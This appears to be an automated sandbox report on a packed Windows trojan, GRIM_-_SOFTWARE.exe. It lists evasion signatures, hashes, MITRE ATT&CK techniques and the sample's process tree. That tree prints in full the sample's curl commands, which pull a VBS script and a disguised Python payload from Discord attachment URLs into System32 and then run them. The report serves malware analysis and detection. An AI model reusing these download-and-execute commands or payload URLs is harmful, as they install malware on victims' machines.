Overview

overview

9

Static

static

7

GRIM_-_SOFTWARE.exe

windows7-x64

9

GRIM_-_SOFTWARE.exe

windows10-2004-x64

9

Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-03-2023 22:51

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    GRIM_-_SOFTWARE.exe

  • Size

    3.8MB

  • MD5

    6d7e1336a7185a2049c09429cc980b75

  • SHA1

    fd2de69db4416363fb6e34b42e0510256e0e28aa

  • SHA256

    01324ea7cc70df8163a950920606ec33375dd911b5297bf6d204939d19a1ffcb

  • SHA512

    88cf6bfc2deb543e0644100c7a3d547bd18a1e05715a4554d7c45a21a608bbf8821e0427630de9298197477dd5df2317c2c5c2aa01c1cbfe3a7b5531f91547e0

  • SSDEEP

    98304:s/dtvQLaLimy/whXcohnwA3wPiee6R8dqFedrh1NqYQ8wUkdqz54v8mY:gdt8my/ysoBDAPiURzenxuc4k1

Score
9/10
evasionthemidatrojan

Malware Config

Signatures

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
    evasion
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Themida packer 7 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\GRIM_-_SOFTWARE.exe
    "C:\Users\Admin\AppData\Local\Temp\GRIM_-_SOFTWARE.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of WriteProcessMemory
    PID:3804
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/879759160613433367/1083836125409447966/me.vbs --output C:/Windows/System32/prnmngrs.vbs
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3700
      • C:\Windows\system32\curl.exe
        curl --silent https://cdn.discordapp.com/attachments/879759160613433367/1083836125409447966/me.vbs --output C:/Windows/System32/prnmngrs.vbs
        3⤵
        • Drops file in System32 directory
        PID:4064
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/882707027791605791/1089311596381220945/Fortnite_hack_toolv2.py --output C:/Windows/System32/IME/SHARED/IMESEARCHING.py >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2796
      • C:\Windows\system32\curl.exe
        curl --silent https://cdn.discordapp.com/attachments/882707027791605791/1089311596381220945/Fortnite_hack_toolv2.py --output C:/Windows/System32/IME/SHARED/IMESEARCHING.py
        3⤵
        • Drops file in System32 directory
        PID:1572
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:/Windows/System32/prnmngrs.vbs C:/Windows/System32/IME/SHARED/IMESEARCHING.py
      2⤵
      • Checks computer location settings
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:2288
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Windows\System32\prnmngrs.vbs" C:/Windows/System32/IME/SHARED/IMESEARCHING.py
        3⤵
        • Modifies registry class
        PID:3600
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      2⤵
        PID:4732
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c cls
        2⤵
          PID:4204
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c cls
          2⤵
            PID:1856
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\GRIM_-_SOFTWARE.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:4636
            • C:\Windows\system32\certutil.exe
              certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\GRIM_-_SOFTWARE.exe" MD5
              3⤵
                PID:3316
              • C:\Windows\system32\find.exe
                find /i /v "md5"
                3⤵
                  PID:1060
                • C:\Windows\system32\find.exe
                  find /i /v "certutil"
                  3⤵
                    PID:3988
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/879759160613433367/1079159361764602037/Welcome.mp3 --output C:/Windows/System32/Windows_FIEO.mp3 >nul 2>&1
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2584
                  • C:\Windows\system32\curl.exe
                    curl --silent https://cdn.discordapp.com/attachments/879759160613433367/1079159361764602037/Welcome.mp3 --output C:/Windows/System32/Windows_FIEO.mp3
                    3⤵
                    • Drops file in System32 directory
                    PID:3840
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c del C:\Windows\System32\Windows_FIEO.mp3
                  2⤵
                    PID:3760
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c cls
                    2⤵
                      PID:396
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c del C:/Windows/System32/prnmngrs.vbs
                      2⤵
                        PID:4508
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c cls
                        2⤵
                          PID:1640
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c del C:/Windows/System32/IME/SHARED/IMESEARCHING.py
                          2⤵
                            PID:5036
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c cls
                            2⤵
                              PID:4680
                          • C:\Windows\system32\OpenWith.exe
                            C:\Windows\system32\OpenWith.exe -Embedding
                            1⤵
                            • Modifies registry class
                            • Suspicious use of SetWindowsHookEx
                            PID:404
                          • C:\Windows\system32\AUDIODG.EXE
                            C:\Windows\system32\AUDIODG.EXE 0x474 0x4c4
                            1⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5040

                          Network

                          MITRE ATT&CK Matrix ATT&CK v6

                          Initial Access

                          Execution

                          Persistence

                          Privilege Escalation

                          Defense Evasion

                          Virtualization/Sandbox Evasion

                          1
                          T1497

                          Credential Access

                          Discovery

                          Query Registry

                          3
                          T1012

                          Virtualization/Sandbox Evasion

                          1
                          T1497

                          System Information Discovery

                          4
                          T1082

                          Lateral Movement

                          Collection

                          Exfiltration

                          Command and Control

                          Impact

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Windows\System32\IME\SHARED\IMESEARCHING.py
                            Filesize

                            515KB

                            MD5

                            7496905a1473f87362a0b838aaae1d60

                            SHA1

                            e08a76acae2addf87faf4999ccce642dbf903c1a

                            SHA256

                            a02ca0d375e96b5c2c65ff510ea4139cc064d9cef37a7e6e1077ba962ee0ea8c

                            SHA512

                            8d18fb0e5cdbb138d97d315bd8cee9de03ec474c7d1cc426d502723edaf76b0abbd6ba2d0197255bbb13fc3834d0f62ae9f6b2b2a31176547992846f22e0bb70

                            Download Submit
                          • C:\Windows\System32\Windows_FIEO.mp3
                            Filesize

                            9KB

                            MD5

                            7a3a54e10348afe1b57c512ad2466562

                            SHA1

                            ec0c5a195c5b7383cb1cb2058f30f6c054f47c83

                            SHA256

                            74c4c6de3ef3aa22b41bd4f4f7ca88da3424306ce04f110943628e3ff624c18b

                            SHA512

                            e822769580d34bdcedb1b92f58a6838a35debed6a0fdd389c2dfc7b461a0f5761924ddcadf776d0240831d4735404455dc534fd43b64570dfe68b590b31e2f85

                            Download Submit
                          • C:\Windows\System32\prnmngrs.vbs
                            Filesize

                            74B

                            MD5

                            3269bd7a1b211a3c0e4ee7fa6649105a

                            SHA1

                            b96df5fd92329ce6f7f178aaae5852b921e0ff47

                            SHA256

                            c4831319543698126520cb5bb4a438dbca70fc2fa899151dbec613d320a50896

                            SHA512

                            41687e2c11c73185c0f398f6ed66466a8820d6c7b1a740ca3bbfb6cab4a059939db4f20d76d7a7fa3d943a55bd394bae61f2b72947b69995b041611245c787d4

                            Download Submit
                          • memory/3804-145-0x00007FF687160000-0x00007FF687B57000-memory.dmp
                            Filesize

                            10.0MB

                            Download
                          • memory/3804-137-0x00007FF687160000-0x00007FF687B57000-memory.dmp
                            Filesize

                            10.0MB

                            Download
                          • memory/3804-136-0x00007FF687160000-0x00007FF687B57000-memory.dmp
                            Filesize

                            10.0MB

                            Download
                          • memory/3804-135-0x00007FF687160000-0x00007FF687B57000-memory.dmp
                            Filesize

                            10.0MB

                            Download
                          • memory/3804-143-0x00007FF687160000-0x00007FF687B57000-memory.dmp
                            Filesize

                            10.0MB

                            Download
                          • memory/3804-133-0x00007FF687160000-0x00007FF687B57000-memory.dmp
                            Filesize

                            10.0MB

                            Download
                          • memory/3804-134-0x00007FF687160000-0x00007FF687B57000-memory.dmp
                            Filesize

                            10.0MB

                            Download
                          • memory/3804-147-0x00000181EE9C0000-0x00000181EE9D0000-memory.dmp
                            Filesize

                            64KB

                            Download
                          • memory/3804-148-0x00000181EE9C0000-0x00000181EE9D0000-memory.dmp
                            Filesize

                            64KB

                            Download
                          • memory/3804-149-0x00000181EE9C0000-0x00000181EE9D0000-memory.dmp
                            Filesize

                            64KB

                            Download
                          • memory/3804-150-0x00000181EE9C0000-0x00000181EE9D0000-memory.dmp
                            Filesize

                            64KB

                            Download
                          • memory/3804-151-0x00000181EE9D0000-0x00000181EE9D1000-memory.dmp
                            Filesize

                            4KB

                            Download
                          • memory/3804-152-0x00000181EE9C0000-0x00000181EE9D0000-memory.dmp
                            Filesize

                            64KB

                            Download